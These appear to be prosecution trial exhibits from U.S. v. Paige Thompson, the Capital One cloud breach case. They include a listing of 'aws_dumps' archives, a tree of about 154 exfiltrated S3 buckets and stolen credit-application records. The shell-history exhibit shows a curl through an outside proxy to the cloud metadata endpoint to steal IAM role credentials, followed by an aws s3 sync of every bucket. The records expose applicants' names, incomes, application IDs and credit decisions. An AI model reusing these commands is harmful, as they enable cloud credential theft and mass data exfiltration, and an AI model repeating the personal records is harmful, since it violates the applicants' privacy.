| Name ▲ | Description | Type | Size | Created | Modified ▼ | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = EXPORT_1 | Root directory, existing | | 8092896... | 07/10/2019 02:06... | 07/13/2019 22:39... | 07/13/2019 22:39... | rwxr-xr-x | 7044511... |
| .. = aws_dumps (43) | directory, existing | | 2359417... | 07/12/2019 11:25... | 07/12/2019 11:24... | 07/12/2019 14:26... | rwxr-xr-x | 7044517... |
| 2230842799dbb78469157aae81... | file, existing | xz | 8245317... | 07/12/2019 12:51... | 06/27/2019 14:02... | 07/12/2019 12:58... | rw-r--r-- | 9064946... |
| 42lines.net.tar.xz | file, existing | xz | 56136 | 07/12/2019 11:25... | 06/26/2019 15:00... | 07/12/2019 11:25... | rw-r--r-- | 3468481... |
| apperian.tar.xz | file, existing | xz | 2651766... | 07/12/2019 11:25... | 06/27/2019 01:08... | 07/12/2019 11:26... | rw-r--r-- | 4136848... |
| apperian2.tar.xz | file, existing | xz | 264 | 07/12/2019 11:26... | 06/26/2019 15:00... | 07/12/2019 11:26... | rw-r--r-- | 7044952... |
| astem.tar.xz | file, existing | xz | 11808 | 07/12/2019 11:26... | 06/26/2019 15:00... | 07/12/2019 11:26... | rw-r--r-- | 3854640... |
| bck-globaleaks.tar.xz | file, existing | xz | 5845170... | 07/12/2019 13:18... | 06/26/2019 19:26... | 07/12/2019 13:18... | rw-r--r-- | 9690228... |
| btadev.tar.xz | file, existing | xz | 1758031... | 07/12/2019 13:18... | 06/28/2019 21:24... | 07/12/2019 13:32... | rw-r--r-- | 9691539... |
| camplat-ecs-instance-role.tar.xz | file, existing | xz | 1155065... | 07/12/2019 13:32... | 06/26/2019 23:19... | 07/12/2019 13:33... | rw-r--r-- | 1003521... |
| cicd-instance.tar.xz | file, existing | xz | 2909888... | 07/12/2019 11:26... | 06/27/2019 00:46... | 07/12/2019 11:28... | rw-r--r-- | 4243866... |
| code_deploy_role.tar.xz | file, existing | xz | 1656899... | 07/12/2019 11:28... | 06/27/2019 10:08... | 07/12/2019 11:40... | rw-r--r-- | 4382799... |
| DevOpsAAS.tar.xz | file, existing | xz | 3772592... | 07/12/2019 12:58... | 06/26/2019 19:26... | 07/12/2019 12:58... | rw-r--r-- | 9223350... |
| ec2-s3-role.tar.xz | file, existing | xz | 2944011... | 07/12/2019 13:33... | 06/29/2019 08:19... | 07/12/2019 13:55... | rw-r--r-- | 1005971... |
| EC2_readonlys3.tar.xz | file, existing | xz | 1701458... | 07/12/2019 12:58... | 06/29/2019 04:15... | 07/12/2019 13:12... | rw-r--r-- | 9223612... |
| ec2_s3_role.tar.xz | file, existing | xz | 1435016... | 07/12/2019 11:41... | 06/28/2019 01:04... | 07/12/2019 11:51... | rw-r--r-- | 5782085... |
| ecs.tar.xz | file, existing | xz | 1051445... | 07/12/2019 11:40... | 06/28/2019 04:16... | 07/12/2019 11:41... | rw-r--r-- | 5732435... |
| ford.tar.xz | file, existing | xz | 2378614... | 07/12/2019 11:51... | 06/28/2019 18:26... | 07/12/2019 11:51... | rw-r--r-- | 7579707... |
| fuckup.tar.xz | file, existing | xz | 2346418... | 07/12/2019 11:51... | 06/26/2019 15:06... | 07/12/2019 11:51... | rw-r--r-- | 7591309... |
| globalgarner.tar.xz | file, existing | xz | 4079359... | 07/12/2019 11:51... | 06/29/2019 06:28... | 07/12/2019 11:51... | rw-r--r-- | 7591766... |
| hfarm-webserver-role.tar.xz | file, existing | xz | 1021995... | 07/12/2019 13:55... | 06/28/2019 18:40... | 07/12/2019 14:03... | rw-r--r-- | 1063578... |
| hslonboarding-prod-backup1.tar... | file, existing | xz | 408 | 07/12/2019 11:54... | 06/26/2019 15:00... | 07/12/2019 11:54... | rw-r--r-- | 7046591... |
| identiphy.img | file, existing | img | 8589934... | 07/12/2019 12:50... | 06/27/2019 12:58... | 07/12/2019 12:51... | rw-r--r-- | 9049286... |
| identiphy.tar.xz | file, existing | xz | 1375260... | 07/12/2019 11:54... | 06/26/2019 15:00... | 07/12/2019 11:54... | rw-r--r-- | 4024678... |
| infobloxcto.tar.xz | file, existing | xz | 208268 | 07/12/2019 11:54... | 06/26/2019 15:00... | 07/12/2019 11:54... | rw-r--r-- | 3031065... |
| ISRM-WAF-Role.tar.xz | file, existing | xz | 4362319... | 07/12/2019 11:54... | 07/02/2019 18:25... | 07/12/2019 12:26... | rw-r--r-- | 7673268... |
| iwcodeacademy.tar.xz | file, existing | xz | 1348723... | 07/12/2019 12:26... | 06/29/2019 18:15... | 07/12/2019 12:26... | rw-r--r-- | 8462597... |
| LNCSMASTER09-RootRole.tar.xz | file, existing | xz | 7795194... | 07/12/2019 13:12... | 06/29/2019 19:19... | 07/12/2019 13:18... | rw-r--r-- | 9535291... |
| msu.tar.xz | file, existing | xz | 1969869... | 07/12/2019 14:03... | 06/27/2019 10:33... | 07/12/2019 14:05... | rw-r--r-- | 1083658... |
| mystars.tar.xz | file, existing | xz | 9427150... | 07/12/2019 14:05... | 06/26/2019 06:22... | 07/12/2019 14:12... | rw-r--r-- | 1087531... |
| ohio-crash-servers-role.tar.xz | file, existing | xz | 3911406... | 07/12/2019 14:12... | 06/26/2019 19:24... | 07/12/2019 14:12... | rw-r--r-- | 1106090... |
| orangehw.tar.xz | file, existing | xz | 6101036... | 07/12/2019 14:12... | 06/26/2019 19:26... | 07/12/2019 14:12... | rw-r--r-- | 1106116... |
| pbn.tar.xz | file, existing | xz | 8195708... | 07/12/2019 14:12... | 06/26/2019 19:16... | 07/12/2019 14:12... | rw-r--r-- | 4292874... |
| Rotate_Access_key.tar.xz | file, existing | xz | 3756546... | 07/12/2019 12:26... | 06/27/2019 06:31... | 07/12/2019 12:29... | rw-r--r-- | 8487249... |
| s3_logrotate_role.tar.xz | file, existing | xz | 4272754... | 07/12/2019 12:29... | 06/28/2019 15:54... | 07/12/2019 12:30... | rw-r--r-- | 8562747... |
| safesocial.tar.xz | file, existing | xz | 3729377... | 07/12/2019 12:30... | 06/28/2019 19:45... | 07/12/2019 12:30... | rw-r--r-- | 8563581... |
| service_devops.tar.xz | file, existing | xz | 4758105... | 07/12/2019 12:30... | 06/29/2019 19:10... | 07/12/2019 12:30... | rw-r--r-- | 8564283... |
| starofservice.tar.xz | file, existing | xz | 1161328... | 07/12/2019 12:30... | 06/29/2019 22:29... | 07/12/2019 12:31... | rw-r--r-- | 8575330... |
| unicredit.tar.xz | file, existing | xz | 8540101... | 07/12/2019 12:31... | 06/27/2019 13:55... | 07/12/2019 12:39... | rw-r--r-- | 8590534... |
| universia.tar.xz | file, existing | xz | 8363970... | 07/12/2019 14:12... | 06/27/2019 14:11... | 07/12/2019 14:19... | rw-r--r-- | 4371340... |
| user-data.tar.xz | file, existing | xz | 21328 | 07/12/2019 12:39... | 06/26/2019 15:00... | 07/12/2019 12:39... | rw-r--r-- | 3469495... |
| viral.tar.xz | file, existing | xz | 6466268... | 07/12/2019 14:19... | 06/27/2019 19:01... | 07/12/2019 14:25... | rw-r--r-- | 1122878... |
| vodaphone.tar.xz | file, existing | xz | 8334843... | 07/12/2019 14:25... | 06/26/2019 21:17... | 07/12/2019 14:26... | rw-r--r-- | 1135975... |
| wakoopa.tar.xz | file, existing | xz | 2898262... | 07/12/2019 12:39... | 06/27/2019 05:04... | 07/12/2019 12:40... | rw-r--r-- | 8766171... |
| webrole2_s3.tar.xz | file, existing | xz | 1261719... | 07/12/2019 12:40... | 06/28/2019 04:14... | 07/12/2019 12:50... | rw-r--r-- | 8823181... |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 701
Admitted_____

```
4711   curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role | awssession.sh
 4719   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='"ISRM-WAF-Role/{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 710
Admitted_____

```
ISRM-WAF-Role/
├── [       4096 Mar 22   2019]  ace-requests-card-prod-west
├── [       4096 Mar 22   2019]  ace-statefiles-card-prod-west
├── [       4096 Mar 22   2019]  agent-servicing-partnerships-prod-west
├── [       4096 Mar 22   2019]  arcus-terraform-us-east-1
├── [       4096 May 28   2019]  asvcardfraudriskmonitor
├── [       4096 May 28   2019]  asvcardmadproducttranslator-prod
├── [       4096 Mar 22   2019]  asvcardsbdevops-prod
├── [       4096 May 28   2019]  asvdynamicservicingmilestones-prod
├── [       4096 Mar 22   2019]  asvfinancialsoftwareintegration-prod
├── [       4096 Mar 22   2019]  asvsbcnpsl-w
├── [       4096 Mar 22   2019]  autocruise-rehydrate-card-rewards-prod
├── [       4096 Mar 22   2019]  autocruise-rehydrate-card-rewards-prod-west
├── [       4096 Mar 22   2019]  balancetransfer
├── [       4096 Mar 22   2019]  balancetransfer-prod-interpol-west
├── [       4096 Mar 22   2019]  bank-imaging
├── [       4096 Mar 22   2019]  bedrock-cft
├── [       4096 Mar 22   2019]  bullseye-pinpoint-prod
├── [       4096 Mar 22   2019]  can-studiox-prod
├── [       4096 Mar 22   2019]  canada-non-pci-files-prod-us-west-2
├── [       4096 Mar 22   2019]  card-dba-tpa-prod-east
├── [       4096 Mar 22   2019]  card-gamechangers-prod
├── [       4096 Mar 22   2019]  card-gamechangers-prod-west
├── [       4096 Mar 22   2019]  card-jenkins-balancetransfer-tfstates
├── [       4096 Mar 22   2019]  card-jenkins-inventory-us-east-1
├── [       4096 Mar 22   2019]  card-jenkins-langpref-tfstates
├── [       4096 Mar 22   2019]  card-jenkins-ms-line-mgt-tfstates
├── [       4096 Mar 22   2019]  card-jenkins-securedcard-tfstates-us-west-2
├── [       4096 Mar 22   2019]  card-mad-acquisitions-prod-east
├── [       4096 Mar 22   2019]  card-mad-acquisitions-prod-west
├── [       4096 Mar 22   2019]  card-marketedoffers-prod-us-west-2
├── [       4096 Mar 22   2019]  card-scts-canada-preprod-west
├── [       4096 Mar 22   2019]  card-scts-events-canada-preprod-west
├── [       4096 Mar 22   2019]  card-scts-events-canada-prod-west
├── [       4096 May 28   2019]  card-secondlook-prod
├── [       4096 Mar 22   2019]  card-secondlook-prod-west
├── [       4096 Mar 22   2019]  card-securedcard-prod-us-west-2
├── [       4096 Mar 22   2019]  card-snowwatch-prod-us-east-1
├── [       4096 Mar 22   2019]  card-startercard-prod
├── [       4096 Mar 22   2019]  cc-clip-canada-prod-us-west-2
├── [       4096 Mar 22   2019]  ccr-prod-west
├── [       4096 Mar 22   2019]  cds-bogie
├── [       4096 May 28   2019]  chassiseapi-card-prod
├── [       4096 Mar 22   2019]  chassiseapicard-prod-west
├── [       4096 Mar 22   2019]  clip-questionnaire-prod-east
├── [       4096 Mar 22   2019]  closeaccount-prod
├── [       4096 Mar 22   2019]  cm-canada-collections-prod-us-east-1
├── [      28672 Mar 22   2019]  cmt606-test
├── [       4096 May 29   2019]  cof-card-account-change-optout-prod-west
├── [       4096 Mar 22   2019]  cof-card-asvmscampaignmanagement-cs-east
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 711
Admitted_____

```
├── [      4096 Mar 22  2019]  cof-card-asvmscampaignmanagement-cs-west
├── [      4096 Jul  2  2019]  cof-card-cardrtp-prod-uswest2
├── [      4096 Mar 22  2019]  cof-card-core-tsys-prod-west
├── [      4096 Mar 22  2019]  cof-card-mainstreet-elastic-backup-supplement
├── [      4096 May 28  2019]  cof-card-mainstreet-elastic-backup-us-west-2
├── [      4096 Mar 22  2019]  cof-card-marketingdataplatform-dmp-west
├── [      4096 Mar 22  2019]
cof-card-partnerships-servesuright-s3-logs-pr-useast1
├── [      4096 Mar 22  2019]  cof-card-prod-asvauthdecisioning-east
├── [      4096 Mar 22  2019]
cof-card-prod-asvcloudinteractivevoiceresponse-us-east-1-west
├── [      4096 Mar 22  2019]  cof-card-prod-branded-card-payments-east
├── [      4096 Mar 22  2019]  cof-card-prod-ccm-analytics-west
├── [      4096 Mar 22  2019]  cof-card-prod-cdi-prod-crescendo-us-east-1
├── [      4096 Mar 22  2019]  cof-card-prod-channelsperformance-west
├── [      4096 Mar 22  2019]  cof-card-prod-chips-west
├── [      4096 Mar 22  2019]  cof-card-prod-cloudformation-templates-us-west-2
├── [      4096 Mar 22  2019]  cof-card-prod-cloudfront-accesslogs-us-east-1
├── [      4096 Mar 22  2019]  cof-card-prod-collections
├── [      4096 Mar 22  2019]  cof-card-prod-commsec-bank-imaging-west
├── [      4096 Mar 22  2019]  cof-card-prod-credit-application-fulfillment
├── [      4096 Mar 22  2019]  cof-card-prod-creditwise
├── [      4096 Mar 22  2019]  cof-card-prod-creditwise-secondary
├── [      4096 Mar 22  2019]  cof-card-prod-east-asvcardreferrals
├── [      4096 Mar 22  2019]  cof-card-prod-efit-embossing-kek
├── [      4096 Mar 22  2019]  cof-card-prod-efit-embossing-kek-west
├── [      4096 Mar 22  2019]  cof-card-prod-email2pay-dr
├── [      4096 Mar 22  2019]  cof-card-prod-extrewards-prod-data
├── [      4096 Mar 22  2019]  cof-card-prod-fav
├── [      4096 Mar 22  2019]  cof-card-prod-gmdealer-prescreen-east
├── [      4096 Mar 22  2019]  cof-card-prod-gmdealer-prescreen-west
├── [      4096 Mar 22  2019]  cof-card-prod-icatalyst-displaycontent
├── [      4096 Mar 22  2019]  cof-card-prod-icatalyst-elb-logs-elb
├── [      4096 Mar 22  2019]  cof-card-prod-icatalyst-logs
├── [      4096 Mar 22  2019]  cof-card-prod-knb-filtered-west
├── [      4096 Mar 22  2019]  cof-card-prod-knb-final-east
├── [      4096 Mar 22  2019]  cof-card-prod-knight-riders
├── [      4096 Mar 22  2019]  cof-card-prod-ms-eclip6-validation-us-west-2
├── [      4096 Mar 22  2019]  cof-card-prod-ms-line-mgt-us-west-2
├── [      4096 Mar 22  2019]  cof-card-prod-partnerships-pncp
├── [      4096 Mar 22  2019]  cof-card-prod-prd-mgt-fulfillment-orchestrator
├── [      4096 Mar 22  2019]  cof-card-prod-prdmgt-decision-actions
├── [      4096 Mar 22  2019]  cof-card-prod-prodmgt-rewards
├── [      4096 Mar 22  2019]  cof-card-prod-product-management-enc-props
├── [      4096 Mar 22  2019]  cof-card-prod-prospectcontext-file-processed
├── [      4096 Mar 22  2019]
cof-card-prod-prospectcontext-inbound-vendor-file-west
├── [      4096 Mar 22  2019]  cof-card-prod-public-documents
├── [      4096 Mar 22  2019]  cof-card-prod-rad-demised-databases-backup
├── [      4096 Mar 22  2019]  cof-card-prod-referrals-code
```

```
├── [       4096 Mar 22   2019]  cof-card-prod-rewardsone-prod-bogie
├── [       4096 Mar 22   2019]  cof-card-prod-rewardsone-prod-bogie-west
├── [       4096 Mar 22   2019]  cof-card-prod-rewardsone-prod-cassandra-backup
├── [       4096 Mar 22   2019]  cof-card-prod-rewardsone-prod-cassandra-backup-west
├── [       4096 Mar 22   2019]  cof-card-prod-rewardsone-prod-data-west
├── [       4096 Mar 22   2019]  cof-card-sbsalesforce-prod-west
├── [       4096 Mar 22   2019]  cof-card-srm-prd
├── [       4096 Mar 22   2019]  cof-card-ubr-prd-west
├── [       4096 Mar 22   2019]  cof-enterprise-prod-mq
├── [       4096 Mar 22   2019]  cof-fraud-api
├── [       4096 Mar 22   2019]  cof-prod-case-management-stg
├── [       4096 Mar 22   2019]  commerce-digitalcard
├── [       4096 Mar 22   2019]  core-engine-db-elb-logs
├── [       4096 Mar 22   2019]  core-engine-db-elb-logs-west
├── [       4096 Mar 22   2019]  core-engine-installation-west
├── [       4096 Mar 22   2019]  credit-cards-legos-e
├── [       4096 Mar 22   2019]  credit-cards-prod-w
├── [       4096 Mar 22   2019]
credit-keeper-canada-pre-customer-bucket-prod-us-east-1
├── [       4096 Mar 22   2019]  credittracker-redirect.aws-card.cb4good.com
├── [       4096 Mar 22   2019]  customers-accounts-income-prod-west
├── [       4096 Mar 22   2019]  cw4b-client-prod
├── [       4096 Mar 22   2019]  decide-offer-prod-west
├── [       4096 Mar 22   2019]  decideproduct-prod
├── [       4096 Mar 22   2019]  dynamic-app-canada-disclosure-prod-us-east-1
├── [       4096 Mar 22   2019]  efit-efg-landing-outbound-prod-east
├── [       4096 Mar 22   2019]  elasticbeanstalk-us-east-1-427884659784
├── [       4096 Mar 22   2019]  emmo-asvsplunkcof-west
├── [       4096 Mar 22   2019]  envprcarddigitalservicing-east
├── [       4096 Mar 22   2019]  gglassfrogs-cof-card-prod-treatment-policy-west
├── [       4096 Mar 22   2019]  gitfit-lgtm-prod-west
├── [       4096 Mar 22   2019]  hilda-upload-prod-west
├── [       4096 Mar 22   2019]  kalyan-jump
├── [       4096 Mar 22   2019]  kyc-reactive-update-east-prod
├── [       4096 Mar 22   2019]  mercury-west-cof-card-prod
├── [       4096 Mar 22   2019]  mm-prod-ssl-keys
├── [       4096 Mar 22   2019]  omega-data-sync-prod
├── [       4096 Mar 22   2019]  omega-resources-prod
├── [       4096 Mar 22   2019]  omega-resources-west-2
├── [       4096 Mar 22   2019]  papi-certs-prod-west
├── [       4096 Mar 22   2019]  papi-tools-hdr-prd
├── [       4096 Mar 22   2019]  payment-prod-replication-east
├── [       4096 Mar 22   2019]  pmfconnect-prod
├── [       4096 Mar 22   2019]  pong-s3-logs
├── [       4096 Mar 22   2019]  prodawsincubator-east-buypowercard
├── [       4096 Mar 22   2019]  prodawsincubator-east-gm
├── [       4096 Mar 22   2019]  prodawsincubator-west-cabelasclub
├── [       4096 Mar 22   2019]  prom-app-dev-core
├── [       4096 Mar 22   2019]  replication-west-to-east-card-prod
├── [       4096 Mar 22   2019]  sbc-data-solutions-east-prod
```

```
├── [        4096 Mar 22  2019]  sbc-data-solutions-west-prod
├── [        4096 Mar 22  2019]  sbc-high-line-management-west
├── [        4096 Mar 22  2019]  sbcapabilityapi-lambda-prod-west
├── [        4096 Mar 22  2019]  test-env-bucket45450
├── [        4096 Mar 22  2019]  test-prod-bucket-64153323
├── [        4096 Mar 22  2019]  test547646455
├── [        4096 Mar 22  2019]  us-card-kyc-prod-west
├── [        4096 Mar 22  2019]
west-cof-card-prod-prospectcontext-inbound-vendor-file
└── [        4096 Mar 22  2019]  wfadmin-prod

154 directories, 0 files
```





20171212084601_STR_005_ts-inclusion.json



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 713
Admitted_____

PNEPTUNE                               CAPSTONE                               00014444912066788              [CAPSTONE.STREAM.AWS.REQUEST 2018022710420000                                    1    9999
ste><decisionTime>10:42:41</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId></plasticStyleId><offerId></offerId><approvedCreditLimit> 0</approvedCreditLimit><identi
                 PNEPTUNE                               CAPSTONE                               00014604910542714              [CAPSTONE.STREAM.AWS.REQUEST 2018022710440000                                    1    9999
te><decisionTime>10:44:08</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId></plasticStyleId><offerId></offerId><approvedCreditLimit> 0</approvedCreditLimit><identity
:decisionTime>11:08:36</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262952</offerId><approvedCreditLimit> 0</approvedCreditLimit><i
                 PNEPTUNE                               CAPSTONE                               00014444912435199              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
onDate><decisionTime>11:08:36</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260778</offerId><approvedCreditLimit> 0</approvedCreditL
                 PNEPTUNE                               CAPSTONE                               00014604912077628              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
decisionDate><decisionTime>11:08:47</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approved
ionTime>11:08:50</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identi
                 PNEPTUNE                               CAPSTONE                               00014604912077677              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
decisionTime>11:08:50</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><i
                 PNEPTUNE                               CAPSTONE                               00014444912435207              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
decisionTime>11:08:51</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><i
                 PNEPTUNE                               CAPSTONE                               00014444912435215              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
><decisionTime>11:08:51</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260780</offerId><approvedCreditLimit> 0</approvedCreditLimit><
                 PNEPTUNE                               CAPSTONE                               00014444912435256              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
ionTime>11:08:53</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><ident
                 PNEPTUNE                               CAPSTONE                               00014444912077669              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
isionTime>11:08:54</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><iden
                 PNEPTUNE                               CAPSTONE                               00014444912435231              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
:isionTime>11:08:55</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>1000</approvedCreditLimit><id
                 PNEPTUNE                               CAPSTONE                               00014604912077693              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
:isionTime>11:08:55</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262959</offerId><approvedCreditLimit>300</approvedCreditLimit><ide
                 PNEPTUNE                               CAPSTONE                               00014444912435249              [CAPSTONE.STREAM.AWS.REQUEST 2018022711080000                                    1    9999
isionTime>11:08:58</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><iden
                 PNEPTUNE                               CAPSTONE                               00014604912077701              [CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                                    1    9999
decisionTime>11:09:00</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><i



2018022710420000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >e  e<App><AppData><solicitationReferenceNumber>00014444912066788</solicitationRe
fferId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>55000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>6
 2018022710440000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >e  e<App><AppData><solicitationReferenceNumber>00014609310542714</solicitationRe
ferId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>122000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>6
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >h  h<App><AppData><solicitationReferenceNumber>00014604912077644</solicitationRe
52</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>33000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoSc

2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >q  q<App><AppData><solicitationReferenceNumber>00014444912435199</solicitationRe
d>1260778</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>60000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averag
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >x  x<App><AppData><solicitationReferenceNumber>00014604912077628</solicitationRe
offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>25000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode>
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >c  c<App><AppData><solicitationReferenceNumber>00014444912435207</solicitationRe
ferId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>15000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >h  h<App><AppData><solicitationReferenceNumber>00014604912077677</solicitationRe
3</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>29000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoSc
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >j  j<App><AppData><solicitationReferenceNumber>00014444912435215</solicitationRe
9</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>30000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoSc
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >i  i<App><AppData><solicitationReferenceNumber>00014444912435256</solicitationRe
780</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>25000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoS
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >g  g<App><AppData><solicitationReferenceNumber>00014444912435231</solicitationRe
fferId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>130000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >g  g<App><AppData><solicitationReferenceNumber>00014444912435231</solicitationRe
offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>28000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >i  i<App><AppData><solicitationReferenceNumber>00014444912435223</solicitationRe
/offerId><approvedCreditLimit>1000</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>40000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoSco
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >f  f<App><AppData><solicitationReferenceNumber>00014604912077693</solicitationRe
/offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>55000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScor
2018022711080000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >g  g<App><AppData><solicitationReferenceNumber>00014444912435249</solicitationRe
offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>55000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore
2018022711090000                                  yyyyGMO    0  >    CAPSTONE.STREAM.REQUEST                                     >j  j<App><AppData><solicitationReferenceNumber>00014604912077701</solicitationRe
3</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>60000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoSc

umber><applicationId>100000248316B2</applicationId><firstName>LATOSHA </firstName><middleInitial></middleInitial><lastName>STOKES </lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>DEARBORN HE
ageFicoScore></AppData></App>q|•Zk5    B    B
umber><applicationId>100000248390A6</applicationId><firstName>ELIZABETH</firstName><middleInitial>W</middleInitial><lastName>WANGARI</lastName><addressLine1>          </addressLine1><addressLine2     /addressLine2><addressCity>REI
ageFicoScore></AppData></App>Ê|•Z""¶ B   B
